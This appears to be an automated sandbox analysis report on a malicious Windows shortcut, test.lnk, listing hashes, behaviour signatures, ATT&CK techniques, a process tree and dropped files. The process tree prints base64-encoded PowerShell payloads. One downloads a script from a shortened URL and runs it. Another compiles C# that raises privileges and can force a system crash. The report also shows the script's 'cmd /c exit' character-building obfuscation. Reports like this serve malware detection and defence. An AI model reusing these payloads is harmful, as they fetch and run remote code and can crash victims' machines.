de6d56ae01166232f2cb403c86d2ddf59d7654510100971fcd0fe59a3a8e9944

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17/10/2024, 18:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.lnk
Size

1KB
MD5

02e1f1ea7dc301147433623d31e5a294
SHA1

b882f489808747b6201b113d306a42d533ca229e
SHA256

de6d56ae01166232f2cb403c86d2ddf59d7654510100971fcd0fe59a3a8e9944
SHA512

3aa0615c43e1598e04af1208356c7b4f0d0310723f23837975141a46dc9191a9be0c2ddea95a56abbe335ce82a85f5f24a73982af8cb7051d622aaeb6b198554

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
8	4448	powershell.exe
9	4448	powershell.exe
16	4448	powershell.exe
20	4448	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4448	powershell.exe
4448	powershell.exe
1948	powershell.exe
1948	powershell.exe
2756	powershell.exe
2756	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4448	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	2756	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2128 wrote to memory of 4448	2128	cmd.exe	85
PID 2128 wrote to memory of 4448	2128	cmd.exe	85
PID 4448 wrote to memory of 1660	4448	powershell.exe	91
PID 4448 wrote to memory of 1660	4448	powershell.exe	91
PID 1660 wrote to memory of 4412	1660	cmd.exe	92
PID 1660 wrote to memory of 4412	1660	cmd.exe	92
PID 1660 wrote to memory of 3024	1660	cmd.exe	93
PID 1660 wrote to memory of 3024	1660	cmd.exe	93
PID 1660 wrote to memory of 4336	1660	cmd.exe	94
PID 1660 wrote to memory of 4336	1660	cmd.exe	94
PID 1660 wrote to memory of 3288	1660	cmd.exe	95
PID 1660 wrote to memory of 3288	1660	cmd.exe	95
PID 1660 wrote to memory of 4236	1660	cmd.exe	96
PID 1660 wrote to memory of 4236	1660	cmd.exe	96
PID 1660 wrote to memory of 1848	1660	cmd.exe	97
PID 1660 wrote to memory of 1848	1660	cmd.exe	97
PID 1660 wrote to memory of 1700	1660	cmd.exe	98
PID 1660 wrote to memory of 1700	1660	cmd.exe	98
PID 1660 wrote to memory of 3188	1660	cmd.exe	99
PID 1660 wrote to memory of 3188	1660	cmd.exe	99
PID 1660 wrote to memory of 2848	1660	cmd.exe	100
PID 1660 wrote to memory of 2848	1660	cmd.exe	100
PID 1660 wrote to memory of 3124	1660	cmd.exe	101
PID 1660 wrote to memory of 3124	1660	cmd.exe	101
PID 1660 wrote to memory of 4572	1660	cmd.exe	102
PID 1660 wrote to memory of 4572	1660	cmd.exe	102
PID 1660 wrote to memory of 1336	1660	cmd.exe	103
PID 1660 wrote to memory of 1336	1660	cmd.exe	103
PID 1660 wrote to memory of 2064	1660	cmd.exe	104
PID 1660 wrote to memory of 2064	1660	cmd.exe	104
PID 1660 wrote to memory of 2832	1660	cmd.exe	105
PID 1660 wrote to memory of 2832	1660	cmd.exe	105
PID 1660 wrote to memory of 4540	1660	cmd.exe	106
PID 1660 wrote to memory of 4540	1660	cmd.exe	106
PID 1660 wrote to memory of 2740	1660	cmd.exe	107
PID 1660 wrote to memory of 2740	1660	cmd.exe	107
PID 1660 wrote to memory of 3896	1660	cmd.exe	108
PID 1660 wrote to memory of 3896	1660	cmd.exe	108
PID 1660 wrote to memory of 708	1660	cmd.exe	109
PID 1660 wrote to memory of 708	1660	cmd.exe	109
PID 1660 wrote to memory of 4528	1660	cmd.exe	110
PID 1660 wrote to memory of 4528	1660	cmd.exe	110
PID 1660 wrote to memory of 3876	1660	cmd.exe	111
PID 1660 wrote to memory of 3876	1660	cmd.exe	111
PID 1660 wrote to memory of 4160	1660	cmd.exe	112
PID 1660 wrote to memory of 4160	1660	cmd.exe	112
PID 1660 wrote to memory of 3968	1660	cmd.exe	113
PID 1660 wrote to memory of 3968	1660	cmd.exe	113
PID 1660 wrote to memory of 1620	1660	cmd.exe	114
PID 1660 wrote to memory of 1620	1660	cmd.exe	114
PID 1660 wrote to memory of 4704	1660	cmd.exe	115
PID 1660 wrote to memory of 4704	1660	cmd.exe	115
PID 1660 wrote to memory of 976	1660	cmd.exe	116
PID 1660 wrote to memory of 976	1660	cmd.exe	116
PID 1660 wrote to memory of 3436	1660	cmd.exe	117
PID 1660 wrote to memory of 3436	1660	cmd.exe	117
PID 1660 wrote to memory of 4724	1660	cmd.exe	118
PID 1660 wrote to memory of 4724	1660	cmd.exe	118
PID 1660 wrote to memory of 4856	1660	cmd.exe	119
PID 1660 wrote to memory of 4856	1660	cmd.exe	119
PID 1660 wrote to memory of 4416	1660	cmd.exe	120
PID 1660 wrote to memory of 4416	1660	cmd.exe	120
PID 1660 wrote to memory of 3028	1660	cmd.exe	121
PID 1660 wrote to memory of 3028	1660	cmd.exe	121

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\test.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\.cmd""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1660
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 97
      4⤵
      PID:4412
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 98
      4⤵
      PID:3024
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 99
      4⤵
      PID:4336
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 100
      4⤵
      PID:3288
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 101
      4⤵
      PID:4236
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 102
      4⤵
      PID:1848
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 103
      4⤵
      PID:1700
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 104
      4⤵
      PID:3188
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 105
      4⤵
      PID:2848
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 106
      4⤵
      PID:3124
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 107
      4⤵
      PID:4572
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 108
      4⤵
      PID:1336
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 109
      4⤵
      PID:2064
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 110
      4⤵
      PID:2832
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 111
      4⤵
      PID:4540
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 112
      4⤵
      PID:2740
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 113
      4⤵
      PID:3896
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 114
      4⤵
      PID:708
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 115
      4⤵
      PID:4528
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 116
      4⤵
      PID:3876
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 117
      4⤵
      PID:4160
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 118
      4⤵
      PID:3968
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 119
      4⤵
      PID:1620
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 120
      4⤵
      PID:4704
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 121
      4⤵
      PID:976
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 122
      4⤵
      PID:3436
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 65
      4⤵
      PID:4724
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 66
      4⤵
      PID:4856
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 67
      4⤵
      PID:4416
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 68
      4⤵
      PID:3028
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 69
      4⤵
      PID:3636
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 70
      4⤵
      PID:2384
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 71
      4⤵
      PID:4156
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 72
      4⤵
      PID:1400
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 73
      4⤵
      PID:4744
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 74
      4⤵
      PID:5112
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 75
      4⤵
      PID:3156
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 76
      4⤵
      PID:2020
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 77
      4⤵
      PID:1048
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 78
      4⤵
      PID:2060
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 79
      4⤵
      PID:4428
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 80
      4⤵
      PID:1208
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 81
      4⤵
      PID:1328
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 82
      4⤵
      PID:3904
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 83
      4⤵
      PID:2184
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 84
      4⤵
      PID:2996
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 85
      4⤵
      PID:1392
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 86
      4⤵
      PID:4292
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 87
      4⤵
      PID:1216
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 88
      4⤵
      PID:3076
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 89
      4⤵
      PID:4812
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 90
      4⤵
      PID:4792
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 48
      4⤵
      PID:884
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 49
      4⤵
      PID:3856
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 50
      4⤵
      PID:1260
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 51
      4⤵
      PID:4444
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 52
      4⤵
      PID:2296
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 53
      4⤵
      PID:4112
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 54
      4⤵
      PID:116
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 55
      4⤵
      PID:2520
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 56
      4⤵
      PID:2016
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 57
      4⤵
      PID:3976
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 123
      4⤵
      PID:1860
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 125
      4⤵
      PID:2936
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 63
      4⤵
      PID:4076
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 58
      4⤵
      PID:4320
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 46
      4⤵
      PID:984
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 61
      4⤵
      PID:3312
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 44
      4⤵
      PID:1724
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 95
      4⤵
      PID:3920
  - - C:\Windows\system32\cmd.exe
      cmd /c exit 45
      4⤵
      PID:1812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGEAbgBnAHUAYQBnAGUAIABDAFMAaABhAHIAcAAgAC0AUABhAHMAcwBUAGgAcgB1ACAALQBDAG8AbQBwAGkAbABlAHIAUABhAHIAYQBtAGUAdABlAHIAcwAgACQAYwA7AGkAZgAoACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBpAG4AIAAxACAALQBNAGEAeAAgADcAKQAgAC0AZQBxACAAMQApAHsAWwBYAF0AOgA6AFMAaABvAHQAKAApAH0AUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIA
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1948
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fep5zsmj\fep5zsmj.cmdline"
        5⤵
        
        PID:2456
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCE3D.tmp" "c:\Users\Admin\AppData\Local\Temp\fep5zsmj\CSC3C7BC6825BF646ACBF61C1E6E61AF981.TMP"
        6⤵
        
        PID:1700
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        5⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Temp\.cmd

Filesize
129KB

MD5
a07fcb39b340ad8dea993a5f5c4d9064

SHA1
77d0f76618142be56abd231b1296277f3e797dc9

SHA256
eeb86bdd38dc4fa93046f3cc0e443018518b81828d34e5d1e75f3bd9aab0f8a7

SHA512
3a4bfac095b40d6ef901f328dd8a807a053190c6812cba4c1a768d9a7256e8635cd187ff3054bfc951df18d0e0cd8941e1fae786650ae98a30447109f76eabe6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCE3D.tmp

Filesize
1KB

MD5
fd2ad5882d66d1680a92989e50d7b652

SHA1
02f6ca216e65ea4a2a061733b0aee4bca311ad68

SHA256
8f2b5cf2c73cf488c8664e53c6db3997a2f60e63cd5e723877b99f41c8e67efe

SHA512
e6ac6f100aef1488a7435aa15ffc36b860145f6f7bd385ec0db47ec0dde9afcc1c37c4502b7739ddfcba6e753dc428259a1c9df5381546f3f3a60cd8914d4465

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vsqz4rpj.avz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fep5zsmj\fep5zsmj.dll

Filesize
4KB

MD5
da88800f45d078f25ce59eaaab1555ba

SHA1
0353356e92a637a4f4e911caa95e2199660ae392

SHA256
38fbd73a333758333322602385d44a80bfccb60a852b094126b6d0f8f97dfec7

SHA512
bb00b483a881715cb48147e95bd3ffaa2ad7caf92bd96540b0a7e1764df61980a2041b77cf6e1c32319205f357266696a7dc994cd2cfaab4f387bf281c8b1b8b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fep5zsmj\CSC3C7BC6825BF646ACBF61C1E6E61AF981.TMP

Filesize
652B

MD5
982b33b71b7f5f6d7da6ddb527c21aac

SHA1
1b1804b9b43720d4ac7c8c19d4b711693a2da575

SHA256
0cc7b2821928a5b98c2af01cc094512f09846d880012b146acba25366d7b6429

SHA512
a46f19225a35ed6e63d9c4f4765ef9470d1600d70246a6bd57f1b9531ff778e9d8f79ead3ffaa821b287cdff7ed519a9b015b583af6243928240abd1df636572

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fep5zsmj\fep5zsmj.0.cs

Filesize
975B

MD5
2c592480a51ff7a7d45e4233ef0d7aee

SHA1
fddf34bb2b397c54521255ae82093da2938642d7

SHA256
6a7de1714f4980afd5cd7bcf889ac569ab62424367bbd3933826cf79bfc22136

SHA512
a91b6dda179595a43d40e6df9db8c7ffe2d4a1ed75e0350675d52b7d450959d502d82cdb1a4c4ba59c4d07661b73e430867fe90212735b4a52e06a5436233d04

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fep5zsmj\fep5zsmj.cmdline

Filesize
175B

MD5
d15a77aed63779ecf3cad2cc91a42899

SHA1
86bd8de33584b59be8738d249a257c80275b771d

SHA256
cf618b3643ef71e99c29064296f14b1cb2195f47281929a89bfc6c5612251b3f

SHA512
a0a0f21b18fb757d0a6639eec4b0168a2409c4bba79f8512560cb0ff4baeb30beeb78860ad295f6b8e603496e732cb0932e467c008e240d0cb802ed2db133319

Download Submit
memory/1948-40-0x00000235A2140000-0x00000235A2148000-memory.dmp

Filesize
32KB

Download
memory/2756-58-0x00000253D2EC0000-0x00000253D2F04000-memory.dmp

Filesize
272KB

Download
memory/2756-59-0x00000253D5460000-0x00000253D54D6000-memory.dmp

Filesize
472KB

Download
memory/4448-14-0x00007FF95A710000-0x00007FF95B1D1000-memory.dmp

Filesize
10.8MB

Download
memory/4448-13-0x00007FF95A710000-0x00007FF95B1D1000-memory.dmp

Filesize
10.8MB

Download
memory/4448-12-0x00000207D7BE0000-0x00000207D7C02000-memory.dmp

Filesize
136KB

Download
memory/4448-2-0x00007FF95A713000-0x00007FF95A715000-memory.dmp

Filesize
8KB

Download
memory/4448-46-0x00007FF95A710000-0x00007FF95B1D1000-memory.dmp

Filesize
10.8MB

Download